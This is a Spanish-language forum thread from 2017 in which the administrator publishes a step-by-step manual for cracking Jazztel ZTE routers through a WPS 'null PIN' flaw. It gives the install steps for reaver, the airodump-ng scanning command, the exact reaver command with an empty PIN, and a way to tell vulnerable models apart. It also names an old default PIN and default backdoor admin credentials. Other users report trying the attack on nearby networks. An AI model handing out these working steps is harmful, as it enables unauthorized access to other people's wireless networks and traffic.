Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel (Pagina 1) / Preguntas generales y busqueda de nuevas brechas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 08-07-2017 00:41:16

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

Explicaciones y manual "paso a paso" para crackear los ZTE H108N, ZTE H218N y ZTE H298N de Jazztel en dos segundos

Vídeo de demostración

vídeo previamente publicado aquï:     0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Routers afectados en España

 

  Jazztel ha exclusivamente empleado estos modelos durante años después elegir ZTE como proveedor de hardware en lugar de Comtrend y Technicolor
      Diría que los primeros PA de este tipo han aparecido por mi barrio en 2012-2013
  Se distinguen fácilmente de los Comtrend porque su eSSID por defecto gasta 4 dígitos ascii (JAZTELL_XXXX) mientras que los Comtrend o Technicolor tienen 4 o 6 caracteres hexadecimales.

pin_null_1.jpg

   
  Al contrario; los routers ZTE F660 y ZTE F680 no son vulnerables.
El ZTE F680 tiene soporte "ac": Son menos comunes que los modelos vulnerables.
Si tu adaptador wifi es de doble banda los distingues enseguida porque emiten dos redes
El eSSID de la red ac es el mismo que el eSSID de la red b/g/n añadiendo "_5G" al final
JAZZTEL_XXXX en frecuencias de 2.4 GHz y JAZZTEL_XXXX_5G en frecuencias de 5GHz
  Si es un FTE 660 o si tu WiFi es unicamente b/g/n se pueden distinguir mirando los paquetes PROBE,
Veremos cómo en el manual, es muy fácil. wink

Antigua vulnerabilidad

En sus inicios estos tres modelos venían con el PIN 12345670 activado por defecto
Es la peor configuración posible ya que reaver las crackeaba con un solo intento: 12345670 es el PIN que manda reaver primero.
Captura del 2014:

1413022356.png

  Tenían además una puerta trasera ya que los técnicos de Jazztel solían "olvidarse" una cuenta con derechos de administrador pam
   user: avanzado
   pass: avanzado
  Eran probablemente los PA los más inseguros en 2014-2015. big_smile

La cosa cambió en 2015: Jazztel actualizó todos los firmwares y el PIN 12345670 no estaba habilitado. (Y la cuenta avanzado:avanzado fue deshabilitada)
Un ataque brute force no daba resultado, no conseguíamos comprobar un solo PIN...
Lo mismo que hoy en día.
  Si intentas hacer un ataque de fuerza bruta no llegarás a ninguna parte:

pin_null_2.jpg

El router manda un M5 (primera mitad supuestamente acertada) cuál sea el PIN que mandes 
Y podrías probar todos los PIN posibles y siempre tendrás un M5 pero nunca tendrás el M7-M8 => llave WPA
¿Por qué? Sigas leyendo... wink

Brecha "PIN NULL" (sin valor atribuido)

  Hemos hablado aquí de esta idea hace meses atrás: Crack WPS mandando un PIN "en blanco" (null)
  Recuerdo que para tener el WPS en modo PIN correctamente configurado un fabricante debe (en teoría):

  • Habilitar el WPS

  • Configurar un PIN que cumple con la regla checksum

  Es lo que estipula la wifi-aliance en su especificación del WPS
En la practica hemos visto que todo es posible y que los fabricantes se saltan las reglas. 
Por ejemplo los routers pueden tener un PIN por defecto "no conforme".
Es decir un PIN que no respectan la regla Checksum (el Amper WLAN_XXXX por ejemplo)
 
  En este caso la configuración WPS se ha hecho así:

BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=
#
  • Tenemos a una variable wps_device_pin que está declarada.

  • El valor atribuido es ... nada. Es decir NULL (nulo) 

  El WPS está habilitado sin PIN definido: Una configuración que sale del guión de la Wifi-Alliance.
    Para recuperar la llave en estos casos se debe mandar un PIN en blanco.
Cosa que podéis hacer con reaver desde la versión 1.6.b. con la opción -p mejorada.( "-p with arbitrary string")

	-p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin

La opción permite mandar la cadena que sea en lugar de un PIN WPS conforme (8 dígitos y el ultimo es una suma de comprobación de los siete anteriores)
se hace con

-p ""

o

-p ''

pin_null_3.jpg

* Podemos mandar un PIN que no cumple la regla del checksum para estos routers que no cumplen la regla
* Podemos mandar un PIN en blanco para crackear los puntos de acceso que tienen su PIN definido sin valor
* Podemos mandar "¡Quiero la llave WPA!".... Desgraciadamente no suele dar resultados, ni siquiera con un "Por favor" big_smile
  Puede ser lo que queréis.
  De paso doy las gracias a binnarymaster para proponer y codificar esta mejora de la opción -p "con cadenas arbitrarias" . (ver Add arbitrary string PIN feature )
  Notad que el fantástico Wireless Air Cut para Windows amigo de nuestro amigo Patcher es también capaz de mandar un PIN en blanco y aprovechar esta brecha. 

Manual paso a paso
   "Crack ZTE Jazztel con PIN nulo"

* Por lo que es de hacerlo desde Windows con waircut les invito a consultar el hilo dedicado: Wireless Air Cut, auditoria del protocolo wps en Windows

1) Instalar reaver 1.6.1 (o una versión superior)

Lo hago desde Kali pero los pasos valen para cualquier distribución basada en debian.

  1. Instalar la dependencia:

    sudo apt install libcap-dev aircrack-ng
  2. Si no está hecho ya instalas git:

    sudo apt install git
  3. Descargas la rama GitHub

    git clone https://github.com/t6x/reaver-wps-fork-t6x.git
  4. Situarse en el directorio que se acaba de crear para alojar el código fuente

    cd /reaver-wps-fork-t6x*/src/
  5. Compilar

    ./configure && make
  6. Instalar

    sudo make install

  Sí tienes reaver ya instalado no pasa nada: Instalando reaver 1.6.1 lo "actualizarás"

Escaneando en búsqueda de objetivo

Activar el modo monitor con airmon-ng

sudo airmon-ng wlan0

Escanear con airodump-ng empleando los parámetros --wps et --manufacturer
Obviamente el parámetro --wps es importante para escanear el WPS. big_smile
  El parámetro --manufacturer nos viene de perla porque vemos al instante si los PA son ZTE.

sudo airodump-ng wlan0mon --manufacturer --wps

pin_null_5.jpg

Crack instantáneo

Una vez que aparece el objetivo parramos el escaneo con ctrl+c
Copiamos el bSSID para pegarlo en nuestra linea de orden reaver

sudo reaver -i wlan0mon -b <bSSID> -vv -p "" 

Si no estamos en buenas condiciones es recomendable fijar el canal para que reaver lo detecte el objetivo y aumentar levemente el tiempo de time out para que reaver espere un poco más la respuesta del router

sudo reaver -i wlan0mon -b <bSSID> -c <nºcanal> -t 8 -T 8 -vv -p ""

pin_null_6.jpg

¿Qué hacer si no me sale?

  Insistir.
Veis en el vídeo que el ataque puede requerir varios intentos.
A estas alturas tenemos claro que vale solo para los Jaztell ZTE.
El problema es que con el escaneo airodump-ng no podemos saber si estamos en presencia de un modelo soportado  (H108N, H218N o H298N)  o de un modelo no soportado (F660 y F680)
  Para distinguirlos:

  • Si llegamos más lejo que el M2 es que está a priori vulnerable.
    Con un ataque sobre F660 y F680 nunca obtenemos el M3:
    pin_null_7.jpg

  • Para tener lo más claro que el agua,

    1. Pasamos en modo managed

      airmon-ng stop wlan0mon
    2. Obtenemos la información emitida en los PROBE.
      Para ello solo tenemos que copiar el bSSID del dispositivo que nos tiene intrigado en la linea que sigue:

      iw wlan1 scan | grep -E "bSSID|Model Number" | grep -A 1 "BSSID"

      Veremos en un instante si es un F660 o un F680 y por lo tanto si no es vulnerable:
      mini_pin_null_8.jpg

Si llevas un tiempo machacando el router y que no obtienes nada aunque sea vulnerable, deja lo reposar un rato y vuelve a intentarlo.
"Lo bueno" es que no se bloquea.

  Jazztel se despide de la escena wifi ibérica saliendo por la puerta grande, dejando a cienes de miles de routers hackeables en unos segundos.
Si tienes un NH198N, un ZH218N o un ZH298N poco puedes hacer para impedir el crack.
  La interfaz web está capada y desconozco la contraseña de Jazztel (no la dan) para abrir una sesión telnet con derechos de administrador. 
  Sería la única forma que se me ocurre para poder deshabilitar del todo el WPS en modo PIN.
La vulnerabilidad se podría explotar en otros routers,
Específicamente contra los modelos que mandan sistemáticamente un M5 (pimera mitad supuestamente acertada) cuando probamos el PIN que sea.
  Este comportamiento errático y ilógico indica que un PIN nulo está configurado.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 08-07-2017 13:35:36

spainderman
Usuario

Registrado: 02-07-2017
Mensajes: 5

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

Hola.

Suelo ser un espectador asiduo que finalmente me inscribí.

Tegno dos vicisitudes por las que se verá que solo soy un usuario aficionado, una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.
La segunda es acerca si en el wifislax se puede usar el reaver 1.6 o he de usar Kali o Debian.

Gracias por todo.

Ultima edición por spainderman (08-07-2017 16:41:20)

Desconectado

#3 08-07-2017 15:47:12

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

sólo soy usuario..

Yo también. smile

una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.

  Patcher te dirá algo pero tampoco el asunto es muy complicado.
waircut hace lo mismo que reaver 1.6.1, y es capaz de mandar un PIN vació.
No hay dudas sobre ello.
Ahora si no te ha funcionado para recuperar la lave en un caso concreto puede ser por las razones evocadas más arriba
La primera cosa en caso de dudas es bien identificar el modelo

iw <interface> scan | grep -E "bSSID|Model Number" | grep -A 1 "BSSID"

  Y por supuesto lo de estar en buenas condiciones para mandar el PIN y procesare la respuesta.
   No ayuda si hay clientes conectados.

Sobre tu segunda vicisitud big_smile;
  Los comandos dados valen para todos los Sistema Operativos basados en Linux excepto
1) la instalación de las dependencias

sudo apt install libcap-dev aircrack-ng

.
2) la instalación de  git

sudo apt install git

  Puedes ver que se usa el comando "apt" para instalar los programas.
Este comando es especifico a las distribuciones basadas en debian (Kali Linux, Ubuntu etc.. etc.. )
  En tu caso no te hace falta instalar aircrrack-ng o libcap-dev: Tu sistema lleva reaver (y aircrack-ng); las dependencias están cumplidas. wink

No es mala idea documentarse un poco rápidito sobre los comandos que lees, para aprender. smile
  Por ejemplo lo de compilar y instalar con

cd /ruta/carpeta/contenedora>/
./configure
make
(sudo) make install

  Es lo más universal que hay y te valdrá para todos los sistemas linux-UNIX que quieres; desde openWRT hasta los servidores de la NSA.
Te cunde buscar un articulo (hay miles) sobre "compilar y instalar con make" y echarle un ojo.
Bienvenido al foro smile

Desconectado

#4 08-07-2017 16:38:25

spainderman
Usuario

Registrado: 02-07-2017
Mensajes: 5

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

Muchas gracias kcdtv, había eliminado mis preguntas pues pensaba que lo propio era que me buscase yo mismo esas respuestas.

No me esperaba el tiempo que le has dedicado.

Las que tengo a la vista son dos 44:F4:36, una con el bssid explicado, JAZZTEL_XXXX  y la otra modificado. No tienen 5G.

Yo en casa veo mas canales wifi que de tv, me obligan a ello y no recibo nada por ello.

Probaré lo que me indicas. Hasta otra.

Ultima edición por spainderman (08-07-2017 16:43:26)

Desconectado

#5 08-07-2017 16:58:23

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

abía eliminado mis preguntas pues pensaba que lo propio era que me buscase yo mismo esas respuestas.

No hacía falta. smile

Para volver a tu caso:
El inicio de bSSID que pones confirma que es un "ZTE Jazztel"

[email protected]:~$ cat /var/lib/ieee-data/oui.txt | grep 44F436
44F436     (base 16)		zte corporation
[email protected]:~$ 

Hace falta mirrar en los PROBES entonces...
Si lo haces con waircut tienes la información WPS PROBE en el cuadro superior de la derecha
Y con linux la linea de comando iw scan con pipe
A veces hay que hacer lo varias veces para poder ver la información.

o en casa veo mas canales wifi que de tv, me obligan a ello y no recibo nada por ello.

Me gustaría tener los mismos derechos que en Estados Unidos y poder disparar a todas estas ondas cuando pisan mi propriedad big_smile

Desconectado

#6 08-07-2017 18:43:48

spainderman
Usuario

Registrado: 02-07-2017
Mensajes: 5

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

Ya lo he comprobado, F 660. El caso es que no emiten en 5G, sólo tienen una señal.

Me queda instalar el reaver cosa que iré haciendo, yo el w95 me lo acabé cuando tenía 24 y ahora ya que casi los doblo y se nota...

Estupendo foro, es lo mínimo que se puede decir.
Saludos.


Me gustaría tener los mismos derechos que en Estados Unidos y poder disparar a todas estas ondas cuando pisan mi propriedad big_smile


Pues sí, allí, puedes ir armado si llevas el arma a la vista, creo que en NY no existe esa ley.
Si pones en VOSE un western de Hollywood de hasta los ´60 +/- probablemente oigas hablar a los indios en su segunda lengua natal, el español.
Ciudad Galvez es Galveztown
En fin, sólo era un apunte.

Ultima edición por spainderman (08-07-2017 19:01:37)

Desconectado

#7 08-07-2017 19:08:32

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

El caso es que no emiten en 5G, sólo tienen una seña

Upss.... Tienes toda la razón del mundo: No es de doble banda.  big_smile
¿Pero entonces escupe el modelo en los PROBE verdad?
¿Si haces el escaneo con iw te devuelve el modelo.?
Deduzco que sí pero para estar seguro...

Pues sí, allí, puedes ir armado si llevas el arma a la vista, creo que en NY no existe esa ley.

Sí, lo que decía era caricatural... En colorado puedes llevar porros en la calle, en Texas son armas... La cosa cambia mucho de un estado a otro. big_smile

Desconectado

#8 08-07-2017 23:11:07

spainderman
Usuario

Registrado: 02-07-2017
Mensajes: 5

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

¿Si haces el escaneo con iw te devuelve el modelo.?
Deduzco que sí pero para estar seguro...


iw me responde

SSID JAZZTEL_XXXX
ZTE F660

Desconectado

#9 09-07-2017 07:41:18

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 325

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

spainderman escribió:

Hola.

Suelo ser un espectador asiduo que finalmente me inscribí.

Tegno dos vicisitudes por las que se verá que solo soy un usuario aficionado, una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.
La segunda es acerca si en el wifislax se puede usar el reaver 1.6 o he de usar Kali o Debian.

Gracias por todo.

Para enviar un pin vacío con waircut no has de poner "" o '', ni siquiera un espacio, debes dejar la casilla vacía, no escribas nada en ella o borra su contenido si lo tuviera. Eso es todo.

Desconectado

#10 09-07-2017 08:14:22

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

@ spainderman
Visto. wink
Gracias por confirmarlo, he corregido el primer post.
@ LDASTING
Se ve que MásMóvil usa el ZTE H208N, otro modelo ZTE pero muy parecido al H108N y el H298N..., podría ser.
Se ve que usan también otro modelo de doble banda y no sé lo que es.

Desconectado

#11 09-07-2017 09:33:18

LDASTING
Expulsado

Registrado: 02-07-2017
Mensajes: 1

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

El de doble banda es f680 de Jazztel

Desconectado

#12 11-07-2017 03:30:45

pastilla
Usuario

Registrado: 10-07-2017
Mensajes: 5

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

¡Hola! Gracias por vuestro trabajo, me estaba saliendo humo porque veia que con el modelo de router correcto no acababa de dar la clave se quedaba colgado en el M6 pasando al M5 de nuevo y asi sucesivamente, despues trasteando con el tiempo y de nuevo sin solucion, perooo al final he visto cual era el problema y era la opcion del pin fantasma el cual se puede añadir de dos formas con: -p ""   o   -p '' , pues bien utilizando wifislax 4.12 y con el ultimo reaver disponible el 1.6.1, la opcion -p "" (la de las comillas dobles) no conseguia acabar el proceso, en el momento que la he cambiado por la opcion -p ''  (la de las comillas simples) lo ha terminado al instante y en el primer intento..

Creo que lo mejor seria solo poner una opcion para que no pase esto.

Un saludo y gracias

Ultima edición por pastilla (11-07-2017 11:12:38)

Desconectado

#13 11-07-2017 13:50:36

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

la opcion del pin fantasma

   
lol Entonces llama a los cazafantasmas. tongue
  No existe ninguno PIN fantasma es un PIN con valor "nulo" (PIN NULL). Se dice en el titulo y está explicado.
  Es mejor llamar las cosas por su nombre en lugar de usar las metáforas estúpidas que te encuentras en los (peores) vídeos de youtube  wink

la opcion -p "" (la de las comillas dobles) no conseguia acabar el proceso, en el momento que la he cambiado por la opcion -p ''  (la de las comillas simples) lo ha terminado al instante y en el primer intento..

  Simples o dobles comillas hacen exactamente lo mismo ya que son separadores para poder delimitar el fin y el inicio de un valor

Seleccion_729.jpg

  No has entendido la opción; hay una sola opción -p.
No está pensada unicamente para mandar un PIN sin valor definido, está pensada para mandar el valor que quieres.   wink

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Pie de página

Información del usuario

Ultimo usuario registrado: AndresFree
Usuarios registrados conectados: 0
Invitados conectados: 15

Estadisticas de los foros

Número total de usuarios registrados: 670
Número total de temas: 863
Número total de mensajes: 7,187

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22